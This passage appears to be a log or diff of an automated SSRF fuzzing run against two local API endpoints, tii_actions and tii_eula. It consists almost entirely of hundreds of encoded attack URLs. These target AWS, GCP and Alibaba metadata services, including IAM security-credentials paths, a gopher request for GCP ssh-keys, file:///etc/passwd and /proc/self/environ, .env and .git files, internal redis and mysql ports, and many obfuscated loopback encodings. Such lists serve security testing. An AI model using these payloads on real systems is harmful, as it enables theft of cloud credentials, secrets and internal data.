`http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235521` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235777` +- Testing: `http://localhost:4200/api/tii_actions?url=425.510.425.510` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_actions?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=instance-data` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A443` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A443` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/tii_actions?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/tii_actions?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_actions?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_actions?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_actions?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_actions?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_actions?url=0%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/tii_eula +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/tii_eula?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=0` +- Testing: `http://localhost:4200/api/tii_eula?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_eula?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_eula?url=2130706433` +- Testing: `http://localhost:4200/api/tii_eula?url=017700000001` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com.localhost` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_eula?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/tii_eula?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/tii_eula?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_eula?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/tii_eula?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/tii_eula?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_eula?url=0%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_eula?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/tii_eula?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_eula?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_eula?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_eula?url=0` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost` +- Testing: `http://localhost:4200/api/tii_eula?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/tii_eula?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/tii_eula?url=7F000001` +- Testing: `http://localhost:4200/api/tii_eula?url=2130706433` +- Testing: `http://localhost:4200/api/tii_eula?url=6425673729` +- Testing: `http://localhost:4200/api/tii_eula?url=127001` +- Testing: `http://localhost:4200/api/tii_eula?url=127_0._0_1` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_eula?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_eula?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_eula?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_eula?url=017700000001` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/tii_eula?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/tii_eula?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254` +- Testing: `http://localhost:4200/api/tii_eula?url=2852039166` +- Testing: `http://localhost:4200/api/tii_eula?url=7147006462` +- Testing: `http://localhost:4200/api/tii_eula?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/tii_eula?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/tii_eula?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/tii_eula?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/tii_eula?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/tii_eula?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/tii_eula?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/tii_eula?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/tii_eula?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/tii_eula?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/tii_eula?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/tii_eula?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/tii_eula?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: 